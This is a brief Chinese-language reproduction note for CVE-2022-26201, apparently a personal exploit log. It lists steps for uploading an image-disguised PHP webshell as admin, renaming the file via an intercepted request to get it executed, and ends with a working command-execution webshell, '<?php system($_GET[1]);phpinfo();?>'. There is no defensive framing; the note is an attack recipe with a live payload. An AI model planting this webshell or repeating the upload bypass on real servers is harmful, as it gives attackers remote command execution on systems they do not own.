CVE-2022-26201

  1. admin新建一个用户,上传图片马
  2. 访问地址,正常访问图片,但无法执行Php代码
  3. 抓包修改文件名
    430还是无执行权限
  4. 构造system权限马:
<?php system($_GET[1]);phpinfo();?>